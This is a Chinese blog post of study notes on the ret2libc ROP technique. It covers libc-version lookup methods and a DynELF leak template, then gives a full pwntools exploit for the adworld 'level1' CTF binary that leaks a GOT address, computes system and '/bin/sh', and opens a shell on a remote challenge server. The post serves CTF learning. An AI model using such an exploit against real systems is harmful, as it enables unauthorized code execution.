【pwn】ROP--retlibc

最新推荐文章于 2024-06-02 21:03:32 发布
最新推荐文章于 2024-06-02 21:03:32 发布
阅读量618 收藏 1
点赞数
分类专栏: pwn 文章标签: rop基础
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41706924/article/details/89607683
版权

ROP中对retlibc技术的一些学习心得

漏洞利用思路:

1.找到泄露库函数地址的漏洞,获取libc版本(因为一般不会给你libc.so文件)

查询libc版本一般有三种方法:
1.libcsearcher库。在编写exp的时候用from LibcSearcher import LibcSearcher导入
通过libc.dump('system')可以得到system函数的偏移,libc.dump('str_bin_sh')得到binsh字符串的偏移
2.pwntools自带的Dynelf,需要先构造一个leak函数和一个可以不断触发溢出的漏洞

一个模板:

def leak(address):


  #各种预处理


  payload = "xxxxxxxx" + address + "xxxxxxxx"


  p.send(payload)


  #各种处理


  data = p.recv(4)


  log.debug("%#x => %s" % (address, (data or '').encode('hex')))


  return data


d = DynELF(leak, elf=ELF("./xxx"))      #初始化DynELF模块 


systemAddress = d.lookup('system', 'libc')  #在libc文件中搜索system函数的地址

	3.在线查询网站,通过函数的后三位数值查询。https://libc.blukat.me

典型的题目–adworld里的level1(非常典型的retlibc)

源码:

ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]

  printf("What's this:%p?\n", &buf);			
  return read(0, &buf, 0x100u);		//溢出点
}

exp:

from pwn import *

from LibcSearcher import LibcSearcher

context.log_level='debug'

#sh = process('./level1')
sh=remote('111.198.29.45',42536)

writeplt= 0x08048370
readgot=0x0804A00C
vuln=0x0804847B



payload = 'a'*0x8c+p32(writeplt)+p32(vuln)+p32(1)+p32(readgot)+p32(4)

#gdb.attach(sh)
sh.sendline(payload)

readaddr=u32(sh.recv(4))
print(hex(readaddr))
libc = LibcSearcher('read', readaddr)
libcbase = readaddr - libc.dump('read')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
payload='a'*0x8c+p32(system_addr)+'a'*4+p32(binsh_addr)
sh.sendline(payload)




sh.interactive()

sh.close()

笔记:

context.log_level='debug’开启调试模式

Joaus
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux中ret2libc入门与实践
counsellor的专栏
08-23 6779
前言 本来想找一个windows下的栈溢出漏洞的poc作为漏洞分析路程的开篇,但是一路走来遇到了太多的问题,大大小小,什么都有。同时因为工作事情比较多,能拿出来调试和写文章的时间也是断断续续。昨天刚有一点心得,今天就忘了一大半,同时会推翻自己之前的结论。 经过漫长的求证过程,打算把NX利剑-ret2libc这种方法和其原理用简单直接的方式展示出来。 简介 DEP-数据执行保护(Data...
9.4 RetLibc实战之利用VirtualAlloc
qq_55202378的博客
11-14 553
Ret2LIbc
pwn学习-ret2libc1
最新发布
Sa1nZen的博客
06-02 164
pwn学习-ret2libc1
PWN基础之构造ROP链(基本ROP)
weixin_46132162的博客
02-02 4215
​随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。**所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
Ret2libc错误总结
qq_63528163的博客
08-12 316
平时做题目的错误总结
使用ret2libc攻击方法绕过数据执行保护
热门推荐
海枫的专栏
02-08 2万+
本文介绍ret2libc攻击方法,可以绕过栈执行保护安全机制
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
xdctf-pwn200-附件资源
03-02
xdctf-pwn200-附件资源
pwn学习】ROP(更新中)
Morphy_Amo的博客
12-10 716
什么是ROP? ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。 gadgets就是以ret结尾的指令序列。 ROP主要是针对NX保护而诞生的方法,NX开启后,难以直接向栈或者堆上注入代码,因此需要利用gadgets来构建可控的程序流。
Pwn-高阶ROP-[栈溢出]/篇3
m0_52343643的博客
05-11 1335
大概调用过程: 也就是我们这里先调用了write函数的plt表项触发了_dl_runtime_resolve函数(会push linkmap)之后会先到.rel.plt段,通过plt中给的push <偏移>在.rel.plt段中找到偏移处对应函数的重定位表项,再通过该表项的r_info(一个偏移量),找到.dynsym段中对应偏移量函数的符号表项,又通过该符号表项的st_name(也是一个偏移量)在.dynstr段找到对应的字符串,最后就会通过这个字符串(函数名)来调用该函数。
pwn基本ROP——ret2libc
turtlesd的博客
04-26 2274
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
ROP之ret2libc
酉酉的博客
06-03 1794
ROP之ret2libc 修改返回地址,让其指向内存中已有的某个函数 当函数调用栈的没有执行权限时,就不能执行我们自己写入的shellcode,就利用程序里或系统里的函数,libc动态链接库中通常就有需要的函数,如system() payload结构 通过溢出覆盖返回地址(相当于call system) padding + system address 调用system时的返回地址,可...
2017广东红帽杯pwn1_writeup:简单ROP
ACdream
05-09 4124
先来正能量一波:作为一个一直没入门pwn的小菜鸟,这一段时间一直被学弟按在地上摩擦很不爽很不爽~~~~~~~~ ------------------------------------------------------------------------------------ 先给出几个学习链接: 一步一步ROP:x86 一步一步ROP:x64 论文: Return-O
(pwn)基本ROP的几个例子(一)
谭宇
11-13 665
对Wiki上的几个例子复现 一、stack_example 点击下载文件stack_example.c 无success入口的情况下,尝试进入success() 对c文件进行编译 ...
pwn——rop练习
sjt670994562的博客
09-17 587
hackme——ROP2 这道题用了一个比较新的方法,去寻找栈溢出的点,他用了syscall调用的相关函数,其中参数的第一位代表序号既调用的哪一个函数,我们称为syscall table调用号,这里4是write 3是read 这里我们用到了 locate unistd_32 这里有大佬的文章 https://blog.csdn.net/mydo/article/details/44997901...
安装LibcSearcher的方法
neuisf的博客
01-04 1万+
在练习Pwn过程中,要用到python的一个库,叫做LibcSearcher,安装方法如下: 1.git clone https://github.com/lieanu/LibcSearcher.git 2.cd LibcSearcher 3.python setup.py install 4.直接运行python exp.py会提示“No module named LibcSearche...
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值